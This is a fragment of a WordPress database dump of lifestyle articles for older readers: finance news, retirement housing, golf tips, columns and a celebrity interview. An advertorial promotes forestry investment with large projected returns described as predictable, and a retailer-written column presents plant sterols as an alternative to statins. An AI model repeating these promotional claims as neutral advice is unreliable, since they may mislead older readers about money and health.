style=\"width: 190px\"><img class=\" wp-image-2670 \" title=\"country garden\" src=\"/wp-content/uploads/2012/07/country-garden.jpg\" alt=\"\" width=\"180\" height=\"270\" /><p class=\"wp-caption-text\">Forget the perfect cottage garden – child care beckons</p></div>&#13;\n<p>Calling all great-grandparents. Retirement is for pursuing your hobbies and other dreams of selffulfilment, travelling the world, creating the perfect cottage garden or just propping up the bar at the golf club of a lunchtime – correct? Alas, no. According to a report by Butlin’s – yes, the holiday camp for people who seem to have swapped water slides and redcoats for the sociology department – even great-grandparents will, by 2037, be called to help their younger family members with child care and all four family generations will take ‘relation vacations’ together. Can you think of anything nicer than spending your weeks with a brood of squealing toddlers then joining them and their exhausted parents and grandparents for a week in Skegness? </p><div class=\"woo-sc-hr\"></div>&#13;\n<p>Meanwhile, on Grim Reaper watch, a group including senior NHS managers has warned that older people who can afford to pay their care home fees get lesser protection under human rights legislation than people funded by the council. As a result they are less able to sue if they are victims of neglect. A triumph of muddle-headed thinking and nonsensical bureaucracy. </p><div class=\"woo-sc-hr\"></div>&#13;\n<p><img class=\"alignright  wp-image-2672\" title=\"GUAG 6 PDF\" src=\"/wp-content/uploads/2012/07/GUAG-6-PDF.jpg\" alt=\"\" width=\"180\" height=\"158\" />Finally, yet another discriminatory stereotype about older people has exploded – this time by consumer research experts Mintel: younger people like custard creams more than their grandparents. Some two-thirds of 16 to 24-year-olds disagreed that traditional teatime biscuits are boring, compared with 55 per cent of over-55s, according to a survey. Thank goodness we have got to the bottom of that. It has been bothering me for years. Good to know someone is wrestling with the really important issues of the day. </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Media watch','Our pick of age-related stories in the news','publish','open','open','','media-watch','','','2018-04-02 20:05:19','2018-04-02 20:05:19','',0,'http://westonspirit.org.uk/media-watch.asp',0,'post','',0),(212,1,'2014-10-20 23:56:53','2014-10-20 23:56:53','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> lwhitney\" title=\"Posts by Linda Whitney\" rel=\"author\"&gt;Linda Whitney</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Money talks\" st_url=\"http://westonspirit.org.uk/2012/07/money-talks-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Money talks\" st_url=\"http://westonspirit.org.uk/2012/07/money-talks-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Money talks\" st_url=\"http://westonspirit.org.uk/2012/07/money-talks-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Money talks\" st_url=\"http://westonspirit.org.uk/2012/07/money-talks-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Money talks\" st_url=\"http://westonspirit.org.uk/2012/07/money-talks-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Our round-up of the latest news in finance</h4>&#13;\n<h3>Home security</h3>&#13;\n<p><img class=\"alignright  wp-image-2744\" title=\"money talks - p11\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/money-talks-p11.jpg\" alt=\"\" width=\"172\" height=\"114\" srcset=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/money-talks-p11.jpg 596w\" sizes=\"(max-width: 172px) 100vw, 172px\" />Two thirds of people would consider using equity in their homes as a source of income in later life, according to research by The Equity Release Council.</p>&#13;\n<p>“Over half of today’s 55-64 year olds believe that their property will play some part in their retirement finances,�? says the council’s chairman Nigel Waterson. This might mean downsizing, renting out a room, using equity release, or any combination of these.</p>&#13;\n<p>Equity release uses the equity in your home to provide an income. It can be complex and expensive so anyone considering it should take independent financial advice – though research by Which? reveals that many equity release advisers did not tell customers basic information such as fees and exit penalties.</p>&#13;\n<p>Choose your adviser carefully. Those registered with SHIP (Safe Home Income Plans) are bound by a code of conduct (see www.ship-ltd.org for a list of members). </p><div class=\"woo-sc-hr\"></div>&#13;\n<h3>Garden theft</h3>&#13;\n<p><img class=\"alignright  wp-image-2746\" title=\"coins - p11\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/coins-p11.jpg\" alt=\"\" width=\"180\" height=\"139\" />One in 12 over-50s is a victim of garden theft, according to Saga Home Insurance, and the average claim worth £620. Those barbecues, water features and statues all add up – a quarter of gardeners over 50 have garden items worth over £250. Most household contents policies cover items in the garden, but for a limited amount – check your policy for details.</p>&#13;\n<p>Meanwhile, lock away expensive items such as lawnmowers, ensure sheds and garages are secure, and prune trees and shrubs near outbuildings to prevent thieves working undetected. Deter thieves by planting thorny shrubs, and consider installing security lights. </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Money talks','Our round-up of the latest news in finance, featured, linda whitney, equity release,','publish','open','open','','money-talks-2','','','2018-04-02 20:05:17','2018-04-02 20:05:17','',0,'http://westonspirit.org.uk/money-talks-2.asp',0,'post','',0),(213,1,'2015-12-29 19:59:22','2015-12-29 19:59:22','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> lyonsdownadmin\" title=\"Posts by lyonsdownadmin\" rel=\"author\"&gt;lyonsdownadmin</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Out of the woods\" st_url=\"http://westonspirit.org.uk/2012/07/out-of-the-woods/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Out of the woods\" st_url=\"http://westonspirit.org.uk/2012/07/out-of-the-woods/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Out of the woods\" st_url=\"http://westonspirit.org.uk/2012/07/out-of-the-woods/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Out of the woods\" st_url=\"http://westonspirit.org.uk/2012/07/out-of-the-woods/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Out of the woods\" st_url=\"http://westonspirit.org.uk/2012/07/out-of-the-woods/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Planning for retirement may be hard, but putting money into forestry means you’ll invest in the planet, as well as your future</h4>&#13;\n<div id=\"attachment_2706\" class=\"wp-caption alignright\" style=\"width: 154px\"><img class=\" wp-image-2706  \" title=\"Ethical forestry - p8\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Ethical-forestry-p8.jpg\" alt=\"\" width=\"144\" height=\"218\" /><p class=\"wp-caption-text\">Timber is in constant demand and could increase in value</p></div>&#13;\n<p>If finding a good investment during this economic downturn is proving difficult, then you may wish to consider forestry. Forestry investments are increasing in popularity as they offer consistent, stable and therefore predictable returns, plus offer environmentally conscious investors peace of mind knowing there money is being invested ethically.</p>&#13;\n<p>Forestry investments work in a simple way; as trees grow, they become more valuable. They ultimately produce valuable timber, a commodity constantly in demand, projected to increase in line with the global population, thus implying a 55 per cent increase by 2050.</p>&#13;\n<p>Ethical Forestry, a leading forestry provider with a proven track record, offers various investments that can be tailored to each individual’s requirements. A typical investment of £18,000 over 12 years projects a total return of £104,189 with regular payouts in years 4, 8, 10 and 12, making them suitable for savings plans and pensions. With a shocking 56 per cent of couples aged over 40 having not worked out how much money they will need to live on in retirement, forestry can offer them a valid way of not sleepwalking into retirement .</p>&#13;\n<p>Ethical Forestry pride themselves on the fact they own all of their plantations outright and have their professional forestry engineers living on-site caring for investors’ trees all year round.</p>&#13;\n<p>In addition, they have created their Forestry Easement Trust that protects rainforest adjacent to their land. In these uncertain times there are some things we can be certain of: trees will grow, timber will be in demand, we all need to make provisions for retirement and we need to care for our planet. Reassuringly, Ethical Forestry’s unique investments offer a solution for all four points, while making a better world for now and for future generations. </p><div class=\"woo-sc-hr\"></div>&#13;\n<h5>0800 0753 010</h5>&#13;\n<h5><em><a href=\"http://www.forestleisure.org.uk/\" target=\"_blank\">www.forestleisure.org.uk</a> <div class=\"woo-sc-hr\"></div></em></h5>&#13;\n<p> </p>&#13;\n									</div>','Out of the woods','Planning for retirement may be hard, but putting money into forestry means you’ll invest in the planet, as well as your future, forestry investment, environmental, ethical forestry','publish','open','open','','out-of-the-woods','','','2018-04-02 20:05:16','2018-04-02 20:05:16','',0,'http://westonspirit.org.uk/out-of-the-woods.asp',0,'post','',0),(214,1,'2016-03-18 18:02:48','2016-03-18 18:02:48','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/07/own-your-future/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/07/own-your-future/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/07/own-your-future/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/07/own-your-future/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2012/07/own-your-future/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Dreaming of the perfect retirement home but reluctant to sell your former home? It’s time to wake up to the benefits of renting</h4>&#13;\n<p><img class=\"alignright size-full wp-image-2774\" title=\"hawthornes - p6\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/hawthornes-p6.jpg\" alt=\"\" width=\"596\" height=\"477\" />Finding a practical solution that matches the quality of your retirement living dream may be easier said than done – and renting may not automatically spring to the top of your list of possible solutions.</p>&#13;\n<p>However, increasing numbers of UK retirees are discovering what their counterparts in America and Australia found out a few years back – that renting your retirement home offers many advantages over continued property ownership.</p>&#13;\n<p>Even more are discovering how you can continue to benefit from both. Hawthorns Retirement has brought its highly successful American formula for retirement living to the UK at Eastbourne, Clevedon and Braintree.</p>&#13;\n<h3>A flexible lifestyle</h3>&#13;\n<p>These developments, in a nutshell, offer you continued independent living, none of the worries of home ownership and total flexibility to change your lifestyle at a month’s notice should circumstances dictate. And all this is achieved by renting your retirement home at The Hawthorns.</p>&#13;\n<p>Your monthly rental includes all your many monthly expenses including all your meals and snacks, utility bills, housekeeping, maintenance – even a free minibus to take you to the shops and back. If you sit down and calculate what you are spending on all those items living in your own home, the rental fees appear very reasonable indeed.</p>&#13;\n<p>As well as the financial argument, life at The Hawthorns offers the added benefits of security, companionship and the flexibility of handing in just one month’s notice of your decision to leave.</p>&#13;\n<p>While many residents fund this idyllic retirement lifestyle from the proceeds of the sale of their home, many others opt to rent out their own property and fund their new-found lifestyle from the rental income, maintaining their property as part of their estate.</p>&#13;\n<h3>It was easy for Alan and Jean</h3>&#13;\n<p>For Alan and Jean Ward (not pictured), the decision to move to The Hawthorns in Braintree was swift in the extreme. They saw an advert for the development in a paper on a Sunday morning, visited in the afternoon and signed on the dotted line the next day following a second visit.</p>&#13;\n<p>Their decision to rent out their existing property rather than sell it was almost as quick, as Alan explains.</p>&#13;\n<p>“Jean has Parkinson’s, I suffer with arthritis and the thought of not having to worry about shopping, cooking and all the other home maintenance chores suddenly sounded so appealing. We loved The Hawthorns the moment we stepped inside so it was an easy as well as swift decision.</p>&#13;\n<p>“I have to admit my initial thought was to sell our own home, a three-bedroom detached bungalow in Tiptree, but after a chat with our son we realised it made more sense to rent out our bungalow. The rental income from that subsidies our rent at The Hawthorns and enables us to enjoy not only a fabulous but an affordable lifestyle.</p>&#13;\n<p>“Of course, it makes complete sense at the moment to rent out the bungalow. With the housing market in the doldrums, I can wait two or three years for prices to pick up and then consider selling it and getting much more capital for it – very appealing.</p>&#13;\n<p>“What’s more, we always know we still have our old home should we ever wish to return to it – which I have to say is highly unlikely, the way we feel about life here,” said Alan. </p><div class=\"woo-sc-hr\"></div>&#13;\n<h5>0845 450 1814</h5>&#13;\n<h5><em><a href=\"http://www.hawthornsretirement.co.uk/\" target=\"_blank\">www.hawthornsretirement.co.uk</a> <div class=\"woo-sc-hr\"></div> </em></h5>&#13;\n									</div>','Own your future','Dreaming of the perfect retirement home but reluctant to sell your former home? It’s time to wake up to the benefits of renting, retirement, retirement homes, renting, all-inclusive retirement, retirement communities, independent living','publish','open','open','','own-your-future','','','2018-04-02 20:05:14','2018-04-02 20:05:14','',0,'http://westonspirit.org.uk/own-your-future.asp',0,'post','',0),(215,1,'2018-03-25 20:18:51','2018-03-25 20:18:51','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> katebutler\" title=\"Posts by Kate Butler\" rel=\"author\"&gt;Kate Butler</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Staying off the statins?\" st_url=\"http://westonspirit.org.uk/2012/07/staying-off-the-statins/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Staying off the statins?\" st_url=\"http://westonspirit.org.uk/2012/07/staying-off-the-statins/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Staying off the statins?\" st_url=\"http://westonspirit.org.uk/2012/07/staying-off-the-statins/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Staying off the statins?\" st_url=\"http://westonspirit.org.uk/2012/07/staying-off-the-statins/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Staying off the statins?\" st_url=\"http://westonspirit.org.uk/2012/07/staying-off-the-statins/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>This month our health column explores a plant-based option for keeping cholesterol levels under control</h4>&#13;\n<div id=\"attachment_2760\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-2760\" title=\"Statins - p13\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Statins-p13.jpg\" alt=\"\" width=\"596\" height=\"431\" /><p class=\"wp-caption-text\">Plant sterols found in oils can lower cholesterol</p></div>&#13;\n<p>Statins are a prescription medication used to lower the level of cholesterol in the blood. Cholesterol is critical to the function of every cell within the body; however it can also contribute to the development of blocked arteries, reducing the flow of blood to the tissues.</p>&#13;\n<p>Researchers at Oxford University recently concluded that all over-50s, including those who are perfectly healthy, should be taking statins to reduce the potential risk of a heart attack. However, statin users can suffer significant side-effects, most commonly muscle pain and weakness.</p>&#13;\n<p>Prescribing statins on such a large scale would be controversial and if lowering cholesterol is key for preventing heart attacks and strokes, natural alternatives are available.</p>&#13;\n<p>One such alternative is plant sterols. Plant sterols are structurally similar to cholesterol, which allows them to work by mimicking cholesterol and competing with it for absorption. The result is that less cholesterol is absorbed from the gut into the bloodstream.</p>&#13;\n<p>Plant sterols are naturally found in foods such as vegetable oils, nuts, seeds, legumes and wholegrains. For most people, though, the use of fortified foods or a food supplement may be required to achieve an optimum intake. </p><div class=\"woo-sc-hr\"></div>&#13;\n<h5><em>Kate Butler</em> is a nutritionist at Holland &amp; Barrett</h5>&#13;\n<h5><a href=\"http://www.hollandandbarrett.com/\" target=\"_blank\"><em>www.hollandandbarrett.com</em></a> <div class=\"woo-sc-hr\"></div> </h5>&#13;\n									</div>','Staying off the statins?','This month our health column explores a plant-based option for keeping cholesterol levels under control','publish','open','open','','staying-off-the-statins','','','2018-04-02 20:05:13','2018-04-02 20:05:13','',0,'http://westonspirit.org.uk/staying-off-the-statins.asp',0,'post','',0),(216,1,'2014-07-08 14:29:49','2014-07-08 14:29:49','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> hdavies\" title=\"Posts by Hunter Davies\" rel=\"author\"&gt;Hunter Davies</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The joys of being a couch potato\" st_url=\"http://westonspirit.org.uk/2012/07/the-joys-of-being-a-couch-potato/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The joys of being a couch potato\" st_url=\"http://westonspirit.org.uk/2012/07/the-joys-of-being-a-couch-potato/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The joys of being a couch potato\" st_url=\"http://westonspirit.org.uk/2012/07/the-joys-of-being-a-couch-potato/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The joys of being a couch potato\" st_url=\"http://westonspirit.org.uk/2012/07/the-joys-of-being-a-couch-potato/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The joys of being a couch potato\" st_url=\"http://westonspirit.org.uk/2012/07/the-joys-of-being-a-couch-potato/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>I don’t remember the l948 Olympics, though I was 12 at the time, alive and kicking. Probably out in the street playing football in bare feet, kicking an old sock. Oh, but we were happy then.</h4>&#13;\n<p><img class=\"alignright  wp-image-2769\" title=\"Hunter -p16\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Hunter-p16.jpg\" alt=\"\" width=\"215\" height=\"107\" />So were the Olympians, even though no new venues were built for them, no Olympic village or any special housing was created, and most of the competitors, even the winners, trained on bread and dripping and went back to normal work the next day. That’s the way to do it. It was of course the Austerity Olympics.</p>&#13;\n<p>Now we have had trillions of pounds being chucked around on monster pieces of architecture which will probably never be used again and soppy new designer uniforms which don’t look half as natty as those in l948. Natty – not used that word, since, well, probably since l948.</p>&#13;\n<p>But of course I will be cheering them all on. I do like to see young people totally knackering themselves.</p>&#13;\n<p>One of the comforts of age is that you don’t feel guilty being a couch potato, stuffing yourself while watching others physically performing. You can moan and swear at them for being useless or not trying hard enough, without anyone saying OK then, let’s see you do better, let’s see you give up four years of your life getting up at five in the morning to train in the rain and the dark.</p>&#13;\n<p>“Oh, I would if I could,” I always say, which, of course, is a lie. “I have this dodgy knee, you see, can’t overdo it at my age.”</p>&#13;\n<p>But I do, all the time. We are at our Lakeland home at the moment and I just walked up around Melbreak, which was very silly, as it is very steep and stony.</p>&#13;\n<p>My knee is now swollen and I know I will have to stick to short walks for the next week. It’s my own fault, really. I played football till I was 50, despite having two cartilage ops.</p>&#13;\n<p>I do swim three times a week at Cockermouth pool, though I hate getting dressed and undressed, what a faff that is, so it is always wonderful to swim in the Lake, being able to walk down to it with my cossie on.</p>&#13;\n<p>I so enjoy the swimming, but I am useless at it – takes me ages to manage 20 lengths, doing alternate lengths breast stroke and back stroke, then my final length is a frantic front crawl going so fast I often have to be helped out of the water, puffing and panting.</p>&#13;\n<p>The thing about continuing to walk and swim, however badly, is that it does help you appreciate and admire those who can do it properly. I also tell myself how good it is for me, keeping me fit and supple and active.</p>&#13;\n<p>Well you need to be, if you are going to somehow drag yourself up on to that couch and cheer on those dopey – I mean wonderful – lads and lasses . . . </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','The joys of being a couch potato','I don’t remember the l948 Olympics, though I was 12 at the time, alive and kicking. Probably out in the street playing football in bare feet, kicking an old sock. Oh, but we were happy then.','publish','open','open','','the-joys-of-being-a-couch-potato','','','2018-04-02 20:05:11','2018-04-02 20:05:11','',0,'http://westonspirit.org.uk/the-joys-of-being-a-couch-potato.asp',0,'post','',0),(217,1,'2016-10-11 11:00:26','2016-10-11 11:00:26','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> dwain\" title=\"Posts by Deborah Wain\" rel=\"author\"&gt;Deborah Wain</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The king of swing\" st_url=\"http://westonspirit.org.uk/2012/07/the-king-of-swing/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The king of swing\" st_url=\"http://westonspirit.org.uk/2012/07/the-king-of-swing/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The king of swing\" st_url=\"http://westonspirit.org.uk/2012/07/the-king-of-swing/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The king of swing\" st_url=\"http://westonspirit.org.uk/2012/07/the-king-of-swing/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The king of swing\" st_url=\"http://westonspirit.org.uk/2012/07/the-king-of-swing/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Get expert advice before you take the fairways for the first time.</h4>&#13;\n<p>The experts agree that lessons are the wisest initial investment in golf but what else do you need to buy to get started?</p>&#13;\n<p><img class=\"alignright  wp-image-2725\" title=\"rbs2_56\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/king-of-swing-p9.jpg\" alt=\"\" width=\"86\" height=\"107\" />Most coaches will let you try out clubs and advise on the most suitable, as one size doesn’t fit all.</p>&#13;\n<p>Once you’ve decided to buy your own clubs, it’s suggested that you start with a few – a putter and two or three easy-to-play metals (or woods) – and go from there.</p>&#13;\n<p>Dress codes at clubs are not as strict as they used to be but, as a general rule, players are required to wear golf shoes, with soft spikes preferred, and socks, long trousers or tailored shorts and golf shirts with a collar and roll neck.</p>&#13;\n<p>Pro-golf shops are a good place to go for advice. </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','The king of swing','Get expert advice before you take the fairways for the first time.','publish','open','open','','the-king-of-swing','','','2018-04-02 20:05:10','2018-04-02 20:05:10','',0,'http://westonspirit.org.uk/the-king-of-swing.asp',0,'post','',0),(218,1,'2014-03-20 15:03:27','2014-03-20 15:03:27','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The sporting spirit\" st_url=\"http://westonspirit.org.uk/2012/07/the-sporting-spirit/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The sporting spirit\" st_url=\"http://westonspirit.org.uk/2012/07/the-sporting-spirit/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The sporting spirit\" st_url=\"http://westonspirit.org.uk/2012/07/the-sporting-spirit/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The sporting spirit\" st_url=\"http://westonspirit.org.uk/2012/07/the-sporting-spirit/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The sporting spirit\" st_url=\"http://westonspirit.org.uk/2012/07/the-sporting-spirit/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Enjoying the games this summer doesn’t have to mean taking part; you can be just as involved from the comfort of your own home</h4>&#13;\n<p>Sport is omnipresent on our TV screens this summer with the Open and, of course, the Olympics to come.</p>&#13;\n<p><img class=\"alignright  wp-image-2657\" title=\"Ed\'s letter -p3\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Eds-letter-p3.jpg\" alt=\"\" width=\"215\" height=\"186\" />For those of us who enjoy the drama of Centre Court, wickets tumbling at Lord’s or the sheer artistry of 11 Spaniards demolishing the opposition in the football European Championship, it has all been a welcome distraction from troubles elsewhere. It’s also a communal activity: mother and I have both enjoyed yelling ‘COME ON!’ at the TV in recent weeks as Murray was vanquished at Wimbledon, England managed a goal against Ukraine.</p>&#13;\n<p>(In a similar vein, my grandmother always enjoyed shouting at the wrestling in ITV’s World of Sport every Saturday.)</p>&#13;\n<p>As a participant, some sport inevitably loses its appeal after a certain age. Football with its bone-splitting tackles, is hardly a veterans’ game, as Hunter Davies and his cartilages will testify (p16). Conversely, there are some sports that one can grow into. Golf, for example, fosters the competitive spirit without over-stretching the hamstrings. If you’re a golfing beginner, Deborah Wain has tips from top coaches on p8-9, from buying your first clubs to finding the right coach.</p>&#13;\n<p>Sport is still an overwhelmingly male world but when it comes to general fitness women are usually better at taking care of their wellbeing than men – hence spas and ‘health resorts’ are female-dominated. We sent Michael Bywater along to Champneys to test whether he could withstand a whole day’s intensive pampering in a beautiful setting surrounded by women (p13). Surprisingly, he took it rather well. </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Editor\'s Letter - The sporting spirit','Enjoying the games this summer doesn’t have to mean taking part; you can be just as involved from the comfort of your own home','publish','open','open','','editors-letter-the-sporting-spirit','','','2018-04-02 20:05:09','2018-04-02 20:05:09','',0,'http://westonspirit.org.uk/editors-letter-the-sporting-spirit.asp',0,'post','',0),(219,1,'2017-02-17 08:43:07','2017-02-17 08:43:07','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 July 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> daphnelockyer\" title=\"Posts by Daphne Lockyer\" rel=\"author\"&gt;Daphne Lockyer</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"This life, Geraldine James\" st_url=\"http://westonspirit.org.uk/2012/07/this-life-geraldine-james/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"This life, Geraldine James\" st_url=\"http://westonspirit.org.uk/2012/07/this-life-geraldine-james/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"This life, Geraldine James\" st_url=\"http://westonspirit.org.uk/2012/07/this-life-geraldine-james/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"This life, Geraldine James\" st_url=\"http://westonspirit.org.uk/2012/07/this-life-geraldine-james/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"This life, Geraldine James\" st_url=\"http://westonspirit.org.uk/2012/07/this-life-geraldine-james/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Geraldine James tells Daphne Lockyer she is busier than ever and she’s more than happy to play older than her 62 years in her latest role</h4>&#13;\n<p><img class=\"alignright  wp-image-2792\" title=\"&quot;Arthur&quot; New York Premiere - Arrivals\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/07/Geraldine-p51.jpg\" alt=\"\" width=\"144\" height=\"180\" />Geraldine James was spending her milestone 60th birthday on a plane bound for New York. It was not how she’d have chosen to celebrate, but the transatlantic journey proved more memorable than expected.</p>&#13;\n<p style=\"font-size: 13px;\"></p><div class=\"woo-sc-quote boxed\"><p>“I look in the mirror and think ‘This is the face that’s taken me forward into my life. Why would I want to change it?’”</p></div>  “I was working on the movie Arthur and the film company had kindly put me at the ‘pointy end’ of the plane,” she laughs. “I looked across and spotted Paul McCartney. He came over and we started chatting. He was on his way to Ringo’s 70th and when I told him it was my birthday, too, the champagne started flowing.&#13;\n<p>“I’d been miserable about spending my 60th somewhere over the Atlantic but suddenly I was partying with one of the absolute heroes of my youth. It was the nicest present ever.”</p>&#13;\n<p>Having just celebrated another birthday (she was 62 this month) the luck has not deserted her. Well known for TV roles such as Sarah Layton in The Jewel in the Crown and sassy hooker Rose in Band of Gold, the award-winning actress is still constantly in demand, both on stage and screen.</p>&#13;\n<p>Today, James is in Dublin where she is working on ITV’s two-part adaptation of Ruth Rendell’s contemporary thriller, Thirteen Steps Down. Surprisingly, perhaps, for a woman never without male admirers, she has elected to play Gwendolen, an elderly curmudgeon. “No sexuality required at all,” she grins.</p>&#13;\n<p>Having been away from the small screen for a while she hopes the audience won’t think, ‘God what happened to her?’ I trust they’ll realise there’s a lot of make-up, costume and acting involved in creating Gwendolen.”</p>&#13;\n<p>Gwendolen’s hair is grey and tied back in an unflattering pony-tail in contrast to James’s, which is usually well-cut and gently highlighted. Her face is unadorned with any kind of flattering make-up. Her clothes are shapeless, too – lots of baggy cardigans and shapeless skirts.</p>&#13;\n<p>It’s been illuminating to think like a much older woman. “Poor Gwendolen is reaching the end of her life and she’s discovering what a waste it’s been. I feel terribly sorry for her but I can’t ever imagine ending up like her.”</p>&#13;\n<p>Personally, she’s looking forward to later life. “I imagine myself down at our cottage in Sussex with my husband, Joe, the pair of us just pottering around the garden and squabbling – which we do all the time anyway, but in an extremely amicable way.”</p>&#13;\n<p>It’s a rosy picture that she hopes will endure. Her mother had battled alcoholism when James was growing up, only to succumb to Alzheimer’s in her last years. “I’d hate to go the same way because it is such a terribly distressing condition especially for the people who love you because the sufferer often doesn’t know they’re ill,” she says.</p>&#13;\n<p>“Still, I do remember my mum having flashes of clarity. Once, to my shame, I was being impatient with her, and she suddenly said, 